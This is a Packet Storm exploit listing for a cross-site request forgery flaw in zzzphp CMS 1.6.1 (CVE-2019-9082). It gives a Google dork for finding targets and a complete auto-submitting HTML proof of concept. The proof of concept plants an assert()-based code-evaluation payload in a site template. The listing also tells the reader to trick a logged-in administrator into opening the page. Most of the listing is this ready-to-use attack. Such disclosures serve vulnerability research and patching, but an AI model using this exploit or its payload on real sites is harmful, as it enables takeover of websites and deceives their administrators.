Lucene search

K
packetstormYang ChenglongPACKETSTORM:151967
HistoryMar 04, 2019 - 12:00 a.m.

zzzphp CMS 1.6.1 Cross Site Request Forgery

2019-03-0400:00:00
Yang Chenglong
packetstormsecurity.com
91

0.975 High

EPSS

Percentile

100.0%

`# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1  
# Google Dork: intext:"2015-2019 zzcms.com"  
  
# Date: 26/02/2019  
  
# Exploit Author: Yang Chenglong  
  
# Vendor Homepage: http://www.zzzcms.com/index.html  
  
# Software Link: http://115.29.55.18/zzzphp.zip  
  
# Version: 1.6.1  
  
# Tested on: windows/Linux,iis/apache  
  
# CVE : CVE-2019-9082  
  
Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.  
  
Exploit:  
  
  
<html>  
  
  
  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
  
  
  
<body>  
  
  
  
<script>history.pushState('', '', '/')</script>  
  
  
  
<form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">  
  
  
  
<input type="hidden" name="file" value="/zzzphp/template/pc/cn2016/html/search.html" />  
  
  
  
<input type="hidden" name="filetext" value="{if:assert($_POST[x])}phpinfo();{end if}" />  
  
  
  
<input type="submit" value="Submit request" />  
  
  
  
</form>  
  
  
  
<script>  
  
  
  
document.forms[0].submit();  
  
  
  
</script>  
  
  
  
</body>  
  
  
  
</html>  
  
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.  
  
Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454  
`